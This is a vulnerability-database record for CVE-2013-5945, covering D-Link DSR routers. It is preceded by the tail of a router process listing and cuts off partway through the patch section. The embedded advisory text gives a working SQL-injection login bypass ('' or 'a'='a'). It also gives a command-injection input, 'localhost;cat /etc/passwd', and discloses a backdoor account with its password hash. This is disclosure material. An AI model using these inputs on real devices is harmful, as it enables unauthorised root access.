 1259 root      3068 S    /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5
 1375 root      3588 S    /pfrm2.0/bin/firewalld /tmp/system.db
 1560 root         0 SW<  [key_timehandler]
 1598 root      7776 S    /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf
 1600 root      8036 S    rvgd /tmp/system.db
 1612 root         0 SW   [cavium]
 1621 root      8424 S    vpnKAd /tmp/system.db
 1685 root      5372 S    /pfrm2.0/sslvpn/bin/firebase -d
 1702 root      5016 S    /pfrm2.0/sslvpn/bin/smm -d
 1711 root      6052 S    /pfrm2.0/sslvpn/bin/httpd
 1712 root      2700 S    /bin/sh /var/sslvpn/var/httpdKeepAlive.sh
 1771 root      2680 S    /pfrm2.0/bin/statusD
 1933 root      3092 S    /pfrm2.0/bin/loggingd /tmp/system.db
 1960 root      5284 S    /pfrm2.0/bin/radEap -d /tmp/system.db
 1962 root      2988 S    /pfrm2.0/bin/rebootd /tmp/system.db
 2004 root      2988 S    /pfrm2.0/bin/crond /tmp/system.db
 2008 root      3260 S    /pfrm2.0/bin/ntpd /tmp/system.db
 2196 root      3128 S    /pfrm2.0/bin/intelAmtd /tmp/system.db
 2205 root      1904 S    /pfrm2.0/bin/fReset
 2311 root      2704 S    /bin/sh /pfrm2.0/bin/release_cache.sh
 2312 root      2704 S    /sbin/getty -L ttyS0 115200 vt100
 2463 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va
 2481 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va
 3355 root      1768 S    /pfrm2.0/bin/rt2860apd
 3443 root      4116 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va
 3451 root      4116 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va
 3457 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var
 3484 root      7836 S    /pfrm2.0/bin/snmpd -p /var/run/snmp.pid
 3518 root      4424 S    /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c
 3630 root      1928 S    /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn-
 5353 root      2704 S    -sh
 7877 root      2568 S    sleep 60
 7953 root      2568 S    sleep 60
 8008 root      2704 R    ps
16749 root      2704 S    -sh
25690 root         0 SW<  [RtmpCmdQTask]
25692 root         0 SW<  [RtmpWscTask]
DSR-250N>



{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-150n",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b64"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-150n",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.05b64"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr router dsr-500",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-1000",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-1000n",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-150",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-150n",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-250n",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-500n",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-150n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-500n 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-500 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-250n 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-250 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-150n 1.05b64",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-150 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-1000n 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-1000 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      },
      {
        "db": "BID",
        "id": "64172"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5945"
      }
    ]
  },
  "configurations": {
    "_id": null,
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-1000_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-1000n_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-150_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-150n_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-250_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-250n_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-500_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-500n_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "nu11.nu11",
    "sources": [
      {
        "db": "BID",
        "id": "64172"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2013-5945",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2013-5945",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.0,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "JVNDB-2013-007216",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2013-15014",
            "impactScore": 8.5,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2013-5945",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2013-007216",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2013-5945",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "JVNDB-2013-007216",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2013-15014",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201312-319",
            "trust": 0.6,
            "value": "CRITICAL"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5945"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua. plural D-Link The product has SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. D-Link DSR is a wireless service router product. The successful use of the SQL injection vulnerability in the D-Link DSR router family enables attackers to control applications, access or modify data, and exploit other vulnerabilities in the underlying database to bypass authentication. D-Link DSR Router Series are prone to an SQL-injection vulnerability. #\n# CVEs:                  \n#     CVE-2013-5945 - Authentication Bypass by SQL-Injection\n#     CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution\n# \n# Vulnerable Routers:    \n#     D-Link DSR-150 (Firmware \u003c v1.08B44)\n#     D-Link DSR-150N (Firmware \u003c v1.05B64)\n#     D-Link DSR-250 and DSR-250N (Firmware \u003c v1.08B44)\n#     D-Link DSR-500 and DSR-500N (Firmware \u003c v1.08B77)\n#     D-Link DSR-1000 and DSR-1000N (Firmware \u003c v1.08B77)\n#\n# Download URL:      \n#     http://tsd.dlink.com.tw\n# \n# Arch:                  \n#     mips and armv6l, Linux\n# \n# Author:                \n#     0_o -- null_null\n#     nu11.nu11 [at] yahoo.com\n#\n# Date:                  \n#     2013-08-18\n# \n# Purpose:               \n#     Get a non-persistent root shell on your D-Link DSR. \n# \n# Prerequisites:         \n#     Network access to the router ports 443 and 23. \n#     !!! 
NO AUTHENTICATION CREDENTIALS REQUIRED !!!\n#\n#\n# A list of identified vulns follows. This list is not exhaustive as I assume\n# more vulns are present that just slipped my attention. \n# The fact that D-Link implemented a backdoor user (for what reason, please??)\n# and just renamed it instead of completely removing it after it was targetted\n# by my previous exploit, as well as the triviality of those vulns I found \n# makes me suggest that more vulns are present that are comparably easy to\n# exploit. \n#\n# Since 2013-12-03, patches are available for:\n#   DSR-150:                Firmware v1.08B44\n#   DSR-150N:               Firmware v1.05B64\n#   DSR-250 and DSR-250N:   Firmware v1.08B44\n#   DSR-500 and DSR-500N:   Firmware v1.08B77\n#   DSR-1000 and DSR-1000N: Firmware v1.08B77\n# via http://tsd.dlink.com.tw\n#\n# And now, have a worthwhile read :-)\n#\n\n\n0. Contents:\n\n\n1. Vulnerability: Authentication Bypass by SQL-Injection \n                  (CVE-2013-5945)\n2. Vulnerability: Privilege Escalation by Arbitrary Command Execution \n                  (CVE-2013-5946)\n3. Exposure:      D-Link backdoor user\n4. Vulnerability: Use of weak hash algorithms\n5. Exposure:      Passwords are stored as plain text in config files\n6. Vulnerability: Bad permissions on /etc/shadow\n\n\n\n1. Vulnerability: Authentication Bypass by SQL-Injection\n                  (CVE-2013-5945)\n\n\n* Possible via the global webUI login form. 
\n\n* File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:\n\n  function login.authenticate(tablename, tableInput)\n    local username = tableInput[\"Users.UserName\"]\n    local password = tableInput[\"Users.Password\"]\n    local cur = db.execute(string.format([[\n                  SELECT *, ROWID AS _ROWID_ FROM %s\n          WHERE %s = \u0027%s\u0027 AND %s = \u0027%s\u0027\n      ]], tablename, \"UserName\", username, \"Password\", password))\n    local result = false\n    local statusCode = \"NONE\"\n    if cur then\n      local row = cur:fetch({}, \"a\")\n      cur:close()\n      result = row ~= nil\n      if result == false then\n        statusCode = \"USER_LOGIN_INVALID_PASSWORD\"\n      end\n    end\n    return result, statusCode\n  end\n\n* This function creates an SQL statement of the form:\n\n  SELECT * FROM \"Users\" WHERE \"UserName\" = \u0027user\u0027 AND \"Password\" = \u0027pass\u0027;\n\n* Since there is a default admin user account called \"admin\" around, this is \n  easily exploitable by providing this to the login form:\n\n  username = admin\n  password = \u0027 or \u0027a\u0027=\u0027a\n\n* ...resulting in this SQL statement:\n\n  SELECT * \n    FROM \"Users\" \n    WHERE \"UserName\" = \u0027admin\u0027 \n      AND \"Password\" = \u0027\u0027 or \u0027a\u0027=\u0027a\u0027;\n\n* Old school SQL injection. Ohh, by the way... \n\n* The same fault can be found in captivePortal.lua \n  -- FREE NETWORKS FOR EVERYONE --\n\n\n\n2. Vulnerability: Privilege Escalation by Arbitrary Command Execution \n                  (CVE-2013-5946)\n\n\n* Possible from the Tools --\u003e System Check page. \n\n* File /pfrm2.0/var/www/systemCheck.htm contains:\n\n  local function runShellCmd(command)\n      local pipe = io.popen(command .. 
\" 2\u003e\u00261\") -- redirect stderr to stdout\n      local cmdOutput = pipe:read(\"*a\")\n      pipe:close()\n      return cmdOutput\n  end\n  if (ButtonType and ButtonType == \"ping\") then\n  [...]\n  local cmd_ping = pingprog .. \" \" .. ipToPing .. \" \" .. options1 .. \" \u003e \" .. pingfile\n        globalCmdOutput = runShellCmd (cmd_ping) \n        statusMessage = \"Pinging \" .. ipToPing\n  [...]\n  elseif (ButtonType and ButtonType == \"traceroute\") then\n  [...]\n    local cmd = traceRouteProg .. \" \" .. ipToTraceRoute .. options\n    globalCmdOutput = runShellCmd(cmd)\n    statusMessage = \"Traceroute To \" .. ipToTraceRoute .. \"...\"\n  [...]\n  elseif (ButtonType and ButtonType == \"dnslookup\") then\n  [...]\n    util.appendDebugOut(\"Exec = \" .. os.execute(nsLookupProg .. \" \" .. internetNameToNsLookup .. \" \u003e \" .. nsLookupFile))\n    statusMessage = \"DNS Lookup for \" .. internetNameToNsLookup\n  [...]\n\n* Command injection is possible in at least these form sections:\n  \n  Ping or Trace an IP Address\n  Perform a DNS Lookup\n  \n* When using a browser, deactivate the \"onclick\" JavaScript checks using \n  a tool like Firebug. Tools like curl are not hindered by these checks. \n  \n* All forms allow input like this:\n  \n  localhost;\u003ccommand\u003e\n  \n  example: \n  \n  localhost;cat /etc/passwd\n  \n* This user provided value is then directly used as part of the input for the\n  call to runShellCmd(c) and thus io.popen(c) in the first form section and \n  os.execute(c) in the second form section. \n  \n* Output from user provided commands gets displayed on the next page beneath \n  the benign command output. 
\n  \n  example: \n  \n  [...]\n  \u003ctextarea rows=\"15\" name=\"S1\" cols=\"60\" wrap=\"off\" class=\"txtbox1\"\u003e\n    traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets\n     1  localhost (127.0.0.1)  0.429 ms  0.255 ms  0.224 ms\n    root:!:0:0:root:/root:/bin/sh\n    gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh\n    nobody:x:0:0:nobody:/nonexistent:/bin/false\n    ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh\n    guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh\n    admin:x:0:2:Linux User,,,:/home/admin:/bin/sh\n  \u0026lt;/textarea\u0026gt;\n  [...]\n  \n  \n  \n3. Exposure: D-Link backdoor user:\n  \n  \n* This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW:\n\n  root:!:0:0:root:/root:/bin/sh\n  gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh\n  nobody:x:0:0:nobody:/nonexistent:/bin/false\n  ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh\n  guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh\n  admin:x:0:2:Linux User,,,:/home/admin:/bin/sh\n\n* You can see the old D-Link backdoor user name \"ZX4q9Q9JUpwTZuo7\". \n  That was the account I hacked before with my previous exploit: \n  http://www.exploit-db.com/papers/22930/\n  And there is a new backdoor user \"gkJ9232xXyruTRmY\" introduced. \n  Instead of removing the backdoor, D-Link just created a new one. \n  \n* I verified this by showing the /etc/profile:\n  \n  # /etc/profile\n  LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib\n  PATH=.:/pfrm2.0/bin:$PATH\n  CLISH_PATH=/etc/clish\n  export PATH LD_LIBRARY_PATH CLISH_PATH\n  # redirect all users except root to CLI\n  if [ \"$USER\" != \"gkJ9232xXyruTRmY\" ] ; then\n  trap \"/bin/login\" SIGINT\n  trap \"\" SIGTSTP\n  /pfrm2.0/bin/cli\n  exit\n  fi\n  PS1=\u0027DSR-250N\u003e \u0027\n  \n  \n  \n4. Vulnerability: Use of weak hash algorithms:\n\n\n* In the /etc/shadow, salted DES hashes are used to store user passwords. 
\n  Since this hash type supports at most 8 characters, users can log in by just \n  typing the first 8 letters of their passwords when using SSH or telnet. \n  \n* An effective password length limitation of 8 characters makes brute force \n  attacks on user accounts very feasible, even if the user chose a longer \n  password. \n\n\n\n5. Exposure: Passwords are stored as plain text in config files:\n\n\n* A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the \n  /tmp/system.db is built on boot time, reveals that all user passwords are \n  stored in plain text. \n\n  Example:\n\n  [...]  \n  Users = {}\n  Users[1] = {}\n  Users[1][\"Capabilities\"] = \"\"\n  Users[1][\"DefaultUser\"] = \"1\"\n  Users[1][\"UserId\"] = \"1\"\n  Users[1][\"FirstName\"] = \"backdoor\"\n  Users[1][\"OID\"] = \"0\"\n  Users[1][\"GroupId\"] = \"1\"\n  Users[1][\"UserName\"] = \"gkJ9232xXyruTRmY\"\n  Users[1][\"Password\"] = \"thisobviouslyisafakepass\"\n  Users[1][\"UserTimeOut\"] = \"10\"\n  Users[1][\"_ROWID_\"] = \"1\"\n  Users[1][\"LastName\"] = \"ssl\"\n  [...]\n  \n  \n  \n6. Vulnerability: Bad permissions on /etc/shadow\n\n\n* This file should have 600 permissions set and not 644. It is world readable. \n  Pointless, since every process runs as root, no user separation is \n  done anyway. 
\n\n  DSR-250N\u003e ls -l -a /etc/shadow\n  -rw-r--r--    1 root     root           115 Sep 27 15:07 /etc/shadow\n  DSR-250N\u003e ps\n    PID USER       VSZ STAT COMMAND\n      1 root      2700 S    init\n      2 root         0 SW\u003c  [kthreadd]\n      3 root         0 SW\u003c  [ksoftirqd/0]\n      4 root         0 SW\u003c  [events/0]\n      5 root         0 SW\u003c  [khelper]\n      8 root         0 SW\u003c  [async/mgr]\n    111 root         0 SW\u003c  [kblockd/0]\n    120 root         0 SW\u003c  [khubd]\n    123 root         0 SW\u003c  [kseriod]\n    128 root         0 SW\u003c  [kslowd]\n    129 root         0 SW\u003c  [kslowd]\n    150 root         0 SW   [pdflush]\n    151 root         0 SW   [pdflush]\n    152 root         0 SW\u003c  [kswapd0]\n    200 root         0 SW\u003c  [aio/0]\n    210 root         0 SW\u003c  [nfsiod]\n    220 root         0 SW\u003c  [crypto/0]\n    230 root         0 SW\u003c  [cns3xxx_spi.0]\n    781 root         0 SW\u003c  [mtdblockd]\n    860 root         0 SW\u003c  [usbhid_resumer]\n    874 root         0 SW\u003c  [rpciod/0]\n    903 root         0 SWN  [jffs2_gcd_mtd4]\n    909 root         0 SWN  [jffs2_gcd_mtd5]\n    918 root      3596 S    unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R\n    999 root      1816 S \u003c  /pfrm2.0/udev/sbin/udevd --daemon\n   1002 root      2988 S    /pfrm2.0/bin/platformd /tmp/system.db\n   1003 root      3120 S    /pfrm2.0/bin/evtDsptchd /tmp/system.db\n   1049 root      2704 S    /usr/sbin/telnetd -l /bin/login\n   1097 root      4560 S    /pfrm2.0/bin/wlanClientArlFlushd\n   1141 root     37000 S    /pfrm2.0/bin/sshd\n   1154 root      3068 S    /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5\n   1255 root      3148 S    /pfrm2.0/bin/nimfd /tmp/system.db\n   1259 root      3068 S    /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5\n   1375 root      3588 S    /pfrm2.0/bin/firewalld /tmp/system.db\n   1560 root         0 SW\u003c  [key_timehandler]\n   1598 
root      7776 S    /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf\n   1600 root      8036 S    rvgd /tmp/system.db\n   1612 root         0 SW   [cavium]\n   1621 root      8424 S    vpnKAd /tmp/system.db\n   1685 root      5372 S    /pfrm2.0/sslvpn/bin/firebase -d\n   1702 root      5016 S    /pfrm2.0/sslvpn/bin/smm -d\n   1711 root      6052 S    /pfrm2.0/sslvpn/bin/httpd\n   1712 root      2700 S    /bin/sh /var/sslvpn/var/httpdKeepAlive.sh\n   1771 root      2680 S    /pfrm2.0/bin/statusD\n   1933 root      3092 S    /pfrm2.0/bin/loggingd /tmp/system.db\n   1960 root      5284 S    /pfrm2.0/bin/radEap -d /tmp/system.db\n   1962 root      2988 S    /pfrm2.0/bin/rebootd /tmp/system.db\n   2004 root      2988 S    /pfrm2.0/bin/crond /tmp/system.db\n   2008 root      3260 S    /pfrm2.0/bin/ntpd /tmp/system.db\n   2196 root      3128 S    /pfrm2.0/bin/intelAmtd /tmp/system.db\n   2205 root      1904 S    /pfrm2.0/bin/fReset\n   2311 root      2704 S    /bin/sh /pfrm2.0/bin/release_cache.sh\n   2312 root      2704 S    /sbin/getty -L ttyS0 115200 vt100\n   2463 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va\n   2481 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va\n   3355 root      1768 S    /pfrm2.0/bin/rt2860apd\n   3443 root      4116 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va\n   3451 root      4116 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va\n   3457 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var\n   3484 root      7836 S    /pfrm2.0/bin/snmpd -p /var/run/snmp.pid\n   3518 root      4424 S    /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c\n   3630 root      1928 S    /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn-\n   5353 root      2704 S    -sh\n   7877 root      2568 S    sleep 60\n   7953 root      2568 S    sleep 60\n   8008 root      2704 R    ps\n  16749 root      2704 S    -sh\n  25690 root         0 SW\u003c  [RtmpCmdQTask]\n  25692 
root         0 SW\u003c  [RtmpWscTask]\n  DSR-250N\u003e\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-5945"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      },
      {
        "db": "BID",
        "id": "64172"
      },
      {
        "db": "PACKETSTORM",
        "id": "124319"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-5945",
        "trust": 3.4
      },
      {
        "db": "EXPLOIT-DB",
        "id": "30061",
        "trust": 2.4
      },
      {
        "db": "BID",
        "id": "64172",
        "trust": 0.9
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "124319",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      },
      {
        "db": "BID",
        "id": "64172"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      },
      {
        "db": "PACKETSTORM",
        "id": "124319"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5945"
      }
    ]
  },
  "id": "VAR-202002-0660",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      }
    ],
    "trust": 1.6
  },
  "iot_taxonomy": {
    "_id": null,
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      }
    ]
  },
  "last_update_date": "2024-11-23T22:08:28.136000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "https://www.dlink.com/"
      },
      {
        "title": "Patch for SQL Injection Vulnerability for D-Link DSR Router Series",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/41586"
      },
      {
